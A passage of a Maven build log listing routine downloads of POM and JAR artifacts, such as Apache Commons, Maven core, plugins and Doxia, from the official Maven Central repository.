https://repo.maven.apache.org/maven2/commons-collections/commons-collections/3.2.2/commons-collections-3.2.2.pom +Downloaded from central: https://repo.maven.apache.org/maven2/commons-collections/commons-collections/3.2/commons-collections-3.2.pom +Downloaded from central: https://repo.maven.apache.org/maven2/commons-digester/commons-digester/1.6/commons-digester-1.6.pom +Downloaded from central: https://repo.maven.apache.org/maven2/commons-digester/commons-digester/1.8/commons-digester-1.8.jar +Downloaded from central: https://repo.maven.apache.org/maven2/commons-digester/commons-digester/1.8/commons-digester-1.8.pom +Downloaded from central: https://repo.maven.apache.org/maven2/commons-io/commons-io/2.11.0/commons-io-2.11.0.pom +Downloaded from central: https://repo.maven.apache.org/maven2/commons-io/commons-io/2.15.1/commons-io-2.15.1.jar +Downloaded from central: https://repo.maven.apache.org/maven2/commons-io/commons-io/2.15.1/commons-io-2.15.1.pom +Downloaded from central: https://repo.maven.apache.org/maven2/commons-io/commons-io/2.16.1/commons-io-2.16.1.jar +Downloaded from central: https://repo.maven.apache.org/maven2/commons-io/commons-io/2.16.1/commons-io-2.16.1.pom +Downloaded from central: https://repo.maven.apache.org/maven2/commons-io/commons-io/2.2/commons-io-2.2.pom +Downloaded from central: https://repo.maven.apache.org/maven2/commons-io/commons-io/2.4/commons-io-2.4.pom +Downloaded from central: https://repo.maven.apache.org/maven2/commons-io/commons-io/2.5/commons-io-2.5.jar +Downloaded from central: https://repo.maven.apache.org/maven2/commons-io/commons-io/2.5/commons-io-2.5.pom +Downloaded from central: https://repo.maven.apache.org/maven2/commons-io/commons-io/2.6/commons-io-2.6.pom +Downloaded from central: https://repo.maven.apache.org/maven2/commons-lang/commons-lang/2.4/commons-lang-2.4.jar +Downloaded from central: https://repo.maven.apache.org/maven2/commons-lang/commons-lang/2.4/commons-lang-2.4.pom +Downloaded from central: https://repo.maven.apache.org/maven2/commons-logging/commons-logging/1.0.3/commons-logging-1.0.3.pom +Downloaded from central: https://repo.maven.apache.org/maven2/commons-logging/commons-logging/1.0/commons-logging-1.0.pom +Downloaded from central: https://repo.maven.apache.org/maven2/commons-logging/commons-logging/1.1/commons-logging-1.1.pom +Downloaded from central: https://repo.maven.apache.org/maven2/commons-logging/commons-logging/1.2/commons-logging-1.2.jar +Downloaded from central: https://repo.maven.apache.org/maven2/commons-logging/commons-logging/1.2/commons-logging-1.2.pom +Downloaded from central: https://repo.maven.apache.org/maven2/dom4j/dom4j/1.1/dom4j-1.1.jar +Downloaded from central: https://repo.maven.apache.org/maven2/dom4j/dom4j/1.1/dom4j-1.1.pom +Downloaded from central: https://repo.maven.apache.org/maven2/javax/inject/javax.inject/1/javax.inject-1.jar +Downloaded from central: https://repo.maven.apache.org/maven2/javax/inject/javax.inject/1/javax.inject-1.pom +Downloaded from central: https://repo.maven.apache.org/maven2/junit/junit/3.8.2/junit-3.8.2.pom +Downloaded from central: https://repo.maven.apache.org/maven2/junit/junit/4.11/junit-4.11.jar +Downloaded from central: https://repo.maven.apache.org/maven2/junit/junit/4.11/junit-4.11.pom +Downloaded from central: https://repo.maven.apache.org/maven2/junit/junit/4.12/junit-4.12.jar +Downloaded from central: https://repo.maven.apache.org/maven2/junit/junit/4.12/junit-4.12.pom +Downloaded from central: https://repo.maven.apache.org/maven2/log4j/log4j/1.2.12/log4j-1.2.12.pom +Downloaded from central: https://repo.maven.apache.org/maven2/logkit/logkit/1.0.1/logkit-1.0.1.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache-extras/beanshell/bsh/2.0b6/bsh-2.0b6.jar +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache-extras/beanshell/bsh/2.0b6/bsh-2.0b6.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/apache/11/apache-11.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/apache/13/apache-13.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/apache/15/apache-15.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/apache/16/apache-16.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/apache/18/apache-18.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/apache/19/apache-19.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/apache/20/apache-20.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/apache/21/apache-21.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/apache/23/apache-23.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/apache/27/apache-27.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/apache/29/apache-29.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/apache/3/apache-3.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/apache/30/apache-30.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/apache/31/apache-31.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/apache/32/apache-32.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/apache/33/apache-33.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/apache/4/apache-4.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/apache/5/apache-5.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/apache/6/apache-6.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/apache/7/apache-7.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/apache/9/apache-9.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/commons/commons-compress/1.11/commons-compress-1.11.jar +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/commons/commons-compress/1.11/commons-compress-1.11.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/commons/commons-compress/1.26.1/commons-compress-1.26.1.jar +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/commons/commons-compress/1.26.1/commons-compress-1.26.1.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/commons/commons-lang3/3.14.0/commons-lang3-3.14.0.jar +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/commons/commons-lang3/3.14.0/commons-lang3-3.14.0.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/commons/commons-lang3/3.8.1/commons-lang3-3.8.1.jar +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/commons/commons-lang3/3.8.1/commons-lang3-3.8.1.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/commons/commons-parent/24/commons-parent-24.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/commons/commons-parent/25/commons-parent-25.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/commons/commons-parent/34/commons-parent-34.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/commons/commons-parent/39/commons-parent-39.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/commons/commons-parent/42/commons-parent-42.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/commons/commons-parent/47/commons-parent-47.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/commons/commons-parent/52/commons-parent-52.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/commons/commons-parent/64/commons-parent-64.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/commons/commons-parent/65/commons-parent-65.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/commons/commons-parent/66/commons-parent-66.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/commons/commons-parent/69/commons-parent-69.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/commons/commons-parent/9/commons-parent-9.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/commons/commons-text/1.12.0/commons-text-1.12.0.jar +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/commons/commons-text/1.12.0/commons-text-1.12.0.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/httpcomponents/httpclient/4.5.13/httpclient-4.5.13.jar +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/httpcomponents/httpclient/4.5.13/httpclient-4.5.13.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/httpcomponents/httpcomponents-client/4.5.13/httpcomponents-client-4.5.13.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/httpcomponents/httpcomponents-core/4.4.13/httpcomponents-core-4.4.13.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/httpcomponents/httpcomponents-core/4.4.14/httpcomponents-core-4.4.14.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/httpcomponents/httpcomponents-parent/11/httpcomponents-parent-11.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/httpcomponents/httpcore/4.4.13/httpcore-4.4.13.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/httpcomponents/httpcore/4.4.14/httpcore-4.4.14.jar +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/httpcomponents/httpcore/4.4.14/httpcore-4.4.14.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/apache-maven/3.9.9/apache-maven-3.9.9-bin.zip +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/apache-maven/3.9.9/apache-maven-3.9.9.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/doxia/doxia-core/1.11.1/doxia-core-1.11.1.jar +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/doxia/doxia-core/1.11.1/doxia-core-1.11.1.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/doxia/doxia-decoration-model/1.11.1/doxia-decoration-model-1.11.1.jar +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/doxia/doxia-decoration-model/1.11.1/doxia-decoration-model-1.11.1.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/doxia/doxia-integration-tools/1.11.1/doxia-integration-tools-1.11.1.jar +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/doxia/doxia-integration-tools/1.11.1/doxia-integration-tools-1.11.1.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/doxia/doxia-logging-api/1.11.1/doxia-logging-api-1.11.1.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/doxia/doxia-logging-api/1.12.0/doxia-logging-api-1.12.0.jar +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/doxia/doxia-logging-api/1.12.0/doxia-logging-api-1.12.0.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/doxia/doxia-module-xhtml/1.11.1/doxia-module-xhtml-1.11.1.jar +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/doxia/doxia-module-xhtml/1.11.1/doxia-module-xhtml-1.11.1.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/doxia/doxia-module-xhtml5/1.11.1/doxia-module-xhtml5-1.11.1.jar +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/doxia/doxia-module-xhtml5/1.11.1/doxia-module-xhtml5-1.11.1.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/doxia/doxia-modules/1.11.1/doxia-modules-1.11.1.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/doxia/doxia-sink-api/1.0-alpha-7/doxia-sink-api-1.0-alpha-7.jar +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/doxia/doxia-sink-api/1.0-alpha-7/doxia-sink-api-1.0-alpha-7.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/doxia/doxia-sink-api/1.0/doxia-sink-api-1.0.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/doxia/doxia-sink-api/1.11.1/doxia-sink-api-1.11.1.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/doxia/doxia-sink-api/1.12.0/doxia-sink-api-1.12.0.jar +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/doxia/doxia-sink-api/1.12.0/doxia-sink-api-1.12.0.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/doxia/doxia-site-renderer/1.11.1/doxia-site-renderer-1.11.1.jar +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/doxia/doxia-site-renderer/1.11.1/doxia-site-renderer-1.11.1.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/doxia/doxia-sitetools/1.11.1/doxia-sitetools-1.11.1.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/doxia/doxia-skin-model/1.11.1/doxia-skin-model-1.11.1.jar +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/doxia/doxia-skin-model/1.11.1/doxia-skin-model-1.11.1.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/doxia/doxia/1.0-alpha-7/doxia-1.0-alpha-7.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/doxia/doxia/1.0/doxia-1.0.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/doxia/doxia/1.11.1/doxia-1.11.1.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/doxia/doxia/1.12.0/doxia-1.12.0.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/enforcer/enforcer-api/3.5.0/enforcer-api-3.5.0.jar +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/enforcer/enforcer-api/3.5.0/enforcer-api-3.5.0.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/enforcer/enforcer-rules/3.5.0/enforcer-rules-3.5.0.jar +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/enforcer/enforcer-rules/3.5.0/enforcer-rules-3.5.0.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/enforcer/enforcer/3.5.0/enforcer-3.5.0.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/maven-aether-provider/3.0/maven-aether-provider-3.0.jar +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/maven-aether-provider/3.0/maven-aether-provider-3.0.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/maven-archiver/3.1.1/maven-archiver-3.1.1.jar +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/maven-archiver/3.1.1/maven-archiver-3.1.1.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/maven-artifact-manager/2.0.6/maven-artifact-manager-2.0.6.jar +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/maven-artifact-manager/2.0.6/maven-artifact-manager-2.0.6.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/maven-artifact-manager/2.2.1/maven-artifact-manager-2.2.1.jar +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/maven-artifact-manager/2.2.1/maven-artifact-manager-2.2.1.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/maven-artifact/2.0.6/maven-artifact-2.0.6.jar +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/maven-artifact/2.0.6/maven-artifact-2.0.6.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/maven-artifact/2.2.1/maven-artifact-2.2.1.jar +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/maven-artifact/2.2.1/maven-artifact-2.2.1.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/maven-artifact/3.0/maven-artifact-3.0.jar +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/maven-artifact/3.0/maven-artifact-3.0.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/maven-core/2.0.6/maven-core-2.0.6.jar +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/maven-core/2.0.6/maven-core-2.0.6.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/maven-core/2.2.1/maven-core-2.2.1.jar +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/maven-core/2.2.1/maven-core-2.2.1.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/maven-core/3.0/maven-core-3.0.jar +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/maven-core/3.0/maven-core-3.0.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/maven-error-diagnostics/2.0.6/maven-error-diagnostics-2.0.6.jar +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/maven-error-diagnostics/2.0.6/maven-error-diagnostics-2.0.6.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/maven-error-diagnostics/2.2.1/maven-error-diagnostics-2.2.1.jar +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/maven-error-diagnostics/2.2.1/maven-error-diagnostics-2.2.1.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/maven-model-builder/3.0/maven-model-builder-3.0.jar +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/maven-model-builder/3.0/maven-model-builder-3.0.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/maven-model/2.0.6/maven-model-2.0.6.jar +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/maven-model/2.0.6/maven-model-2.0.6.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/maven-model/2.2.1/maven-model-2.2.1.jar +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/maven-model/2.2.1/maven-model-2.2.1.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/maven-model/3.0/maven-model-3.0.jar +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/maven-model/3.0/maven-model-3.0.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/maven-monitor/2.0.6/maven-monitor-2.0.6.jar +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/maven-monitor/2.0.6/maven-monitor-2.0.6.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/maven-monitor/2.2.1/maven-monitor-2.2.1.jar +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/maven-monitor/2.2.1/maven-monitor-2.2.1.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/maven-parent/10/maven-parent-10.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/maven-parent/11/maven-parent-11.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/maven-parent/15/maven-parent-15.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/maven-parent/16/maven-parent-16.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/maven-parent/22/maven-parent-22.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/maven-parent/23/maven-parent-23.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/maven-parent/25/maven-parent-25.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/maven-parent/30/maven-parent-30.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/maven-parent/31/maven-parent-31.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/maven-parent/32/maven-parent-32.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/maven-parent/33/maven-parent-33.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/maven-parent/34/maven-parent-34.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/maven-parent/37/maven-parent-37.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/maven-parent/39/maven-parent-39.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/maven-parent/42/maven-parent-42.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/maven-parent/43/maven-parent-43.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/maven-parent/5/maven-parent-5.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/maven-plugin-api/2.0.6/maven-plugin-api-2.0.6.jar +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/maven-plugin-api/2.0.6/maven-plugin-api-2.0.6.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/maven-plugin-api/2.0/maven-plugin-api-2.0.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/maven-plugin-api/2.2.1/maven-plugin-api-2.2.1.jar +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/maven-plugin-api/2.2.1/maven-plugin-api-2.2.1.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/maven-plugin-api/3.0/maven-plugin-api-3.0.jar +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/maven-plugin-api/3.0/maven-plugin-api-3.0.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/maven-plugin-descriptor/2.0.6/maven-plugin-descriptor-2.0.6.jar +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/maven-plugin-descriptor/2.0.6/maven-plugin-descriptor-2.0.6.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/maven-plugin-descriptor/2.2.1/maven-plugin-descriptor-2.2.1.jar +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/maven-plugin-descriptor/2.2.1/maven-plugin-descriptor-2.2.1.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/maven-plugin-parameter-documenter/2.0.6/maven-plugin-parameter-documenter-2.0.6.jar +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/maven-plugin-parameter-documenter/2.0.6/maven-plugin-parameter-documenter-2.0.6.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/maven-plugin-parameter-documenter/2.2.1/maven-plugin-parameter-documenter-2.2.1.jar +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/maven-plugin-parameter-documenter/2.2.1/maven-plugin-parameter-documenter-2.2.1.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/maven-plugin-registry/2.0.6/maven-plugin-registry-2.0.6.jar +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/maven-plugin-registry/2.0.6/maven-plugin-registry-2.0.6.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/maven-plugin-registry/2.2.1/maven-plugin-registry-2.2.1.jar +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/maven-plugin-registry/2.2.1/maven-plugin-registry-2.2.1.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/maven-profile/2.0.6/maven-profile-2.0.6.jar +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/maven-profile/2.0.6/maven-profile-2.0.6.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/maven-profile/2.2.1/maven-profile-2.2.1.jar +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/maven-profile/2.2.1/maven-profile-2.2.1.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/maven-project/2.0.6/maven-project-2.0.6.jar +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/maven-project/2.0.6/maven-project-2.0.6.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/maven-project/2.2.1/maven-project-2.2.1.jar +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/maven-project/2.2.1/maven-project-2.2.1.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/maven-repository-metadata/2.0.6/maven-repository-metadata-2.0.6.jar +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/maven-repository-metadata/2.0.6/maven-repository-metadata-2.0.6.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/maven-repository-metadata/2.2.1/maven-repository-metadata-2.2.1.jar +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/maven-repository-metadata/2.2.1/maven-repository-metadata-2.2.1.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/maven-repository-metadata/3.0/maven-repository-metadata-3.0.jar +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/maven-repository-metadata/3.0/maven-repository-metadata-3.0.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/maven-settings-builder/3.0/maven-settings-builder-3.0.jar +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/maven-settings-builder/3.0/maven-settings-builder-3.0.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/maven-settings/2.0.6/maven-settings-2.0.6.jar +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/maven-settings/2.0.6/maven-settings-2.0.6.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/maven-settings/2.2.1/maven-settings-2.2.1.jar +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/maven-settings/2.2.1/maven-settings-2.2.1.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/maven-settings/3.0/maven-settings-3.0.jar +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/maven-settings/3.0/maven-settings-3.0.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/maven-toolchain/1.0/maven-toolchain-1.0.jar +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/maven-toolchain/1.0/maven-toolchain-1.0.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/maven-toolchain/2.2.1/maven-toolchain-2.2.1.jar +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/maven-toolchain/2.2.1/maven-toolchain-2.2.1.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/maven/2.0.6/maven-2.0.6.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/maven/2.0/maven-2.0.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/maven/2.2.1/maven-2.2.1.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/maven/3.0/maven-3.0.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/maven/3.9.9/maven-3.9.9.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/plugin-tools/maven-plugin-annotations/3.5.2/maven-plugin-annotations-3.5.2.jar +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/plugin-tools/maven-plugin-annotations/3.5.2/maven-plugin-annotations-3.5.2.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/plugin-tools/maven-plugin-tools/3.5.2/maven-plugin-tools-3.5.2.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/plugins/maven-clean-plugin/3.1.0/maven-clean-plugin-3.1.0.jar +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/plugins/maven-clean-plugin/3.1.0/maven-clean-plugin-3.1.0.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/plugins/maven-compiler-plugin/3.8.0/maven-compiler-plugin-3.8.0.jar +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/plugins/maven-compiler-plugin/3.8.0/maven-compiler-plugin-3.8.0.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/plugins/maven-dependency-plugin/3.7.0/maven-dependency-plugin-3.7.0.jar +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/plugins/maven-dependency-plugin/3.7.0/maven-dependency-plugin-3.7.0.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/plugins/maven-enforcer-plugin/3.5.0/maven-enforcer-plugin-3.5.0.jar +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/plugins/maven-enforcer-plugin/3.5.0/maven-enforcer-plugin-3.5.0.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/plugins/maven-enforcer-plugin/maven-metadata.xml +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/plugins/maven-jar-plugin/3.0.2/maven-jar-plugin-3.0.2.jar +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/plugins/maven-jar-plugin/3.0.2/maven-jar-plugin-3.0.2.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/plugins/maven-plugins/30/maven-plugins-30.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/plugins/maven-plugins/31/maven-plugins-31.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/plugins/maven-plugins/32/maven-plugins-32.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/plugins/maven-plugins/42/maven-plugins-42.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/plugins/maven-resources-plugin/3.0.2/maven-resources-plugin-3.0.2.jar +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/plugins/maven-resources-plugin/3.0.2/maven-resources-plugin-3.0.2.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/plugins/maven-surefire-plugin/2.22.1/maven-surefire-plugin-2.22.1.jar +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/plugins/maven-surefire-plugin/2.22.1/maven-surefire-plugin-2.22.1.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/reporting/maven-reporting-api/2.0.6/maven-reporting-api-2.0.6.jar +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/reporting/maven-reporting-api/2.0.6/maven-reporting-api-2.0.6.pom +Downloaded from central: 